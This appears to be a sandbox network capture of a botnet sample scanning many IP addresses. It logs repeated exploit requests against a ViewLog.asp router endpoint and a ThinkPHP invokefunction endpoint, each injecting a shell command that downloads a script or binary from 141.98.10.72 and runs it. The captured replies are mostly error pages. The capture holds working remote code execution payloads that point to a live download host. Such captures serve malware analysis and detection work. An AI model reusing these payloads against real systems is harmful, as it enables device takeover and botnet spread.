                                                        Feb 14, 2024 09:34:13.395968914 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:13.604589939 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:13 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        592192.168.2.1459576112.160.249.11880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:13.635248899 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:13.908400059 CET163INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        593192.168.2.145886231.128.223.468080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:13.646558046 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:13.975647926 CET188INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        Content-Type: text/plain
                                                        Cache-Control: no-cache
                                                        Expires: 0
                                                        Transfer-Encoding: chunked
                                                        Data Raw: 32 32 0d 0a 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a
                                                        Data Ascii: 22URL /cgi-bin/ViewLog.asp Not Found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        594192.168.2.145881062.233.74.2028080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:14.175934076 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:14.453517914 CET83INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        Transfer-Encoding: chunked


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        595192.168.2.144348085.209.181.218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:14.398871899 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:14.622958899 CET349INHTTP/1.1 500 Internal Server Error
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 130
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        596192.168.2.145382662.121.130.2318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:14.409657001 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:14.644778013 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:14 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        597192.168.2.144741294.121.217.1448080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:14.421642065 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        598192.168.2.145198894.123.104.2258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:14.422156096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        599192.168.2.144887231.200.31.2428080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:14.423383951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        600192.168.2.145726294.120.44.778080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:14.423484087 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        601192.168.2.144493094.66.12.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:14.423904896 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        602192.168.2.144692494.120.144.1578080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:14.425050974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        603192.168.2.1440734112.140.70.10580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:15.239263058 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:16.230129004 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        604192.168.2.1453740112.29.94.1380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:15.922753096 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:16.406169891 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:16.767785072 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:16 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        605192.168.2.1434842112.219.242.24280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:16.598465919 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:16.900181055 CET512INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 17:20:40 GMT
                                                        Server: lighttpd/1.4.55
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        606192.168.2.1434760112.121.168.4280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:16.621088982 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:16.944880009 CET331INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:16 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 170
                                                        Connection: close
                                                        Server: openresty
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        607192.168.2.144074694.121.69.478080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:16.968539000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
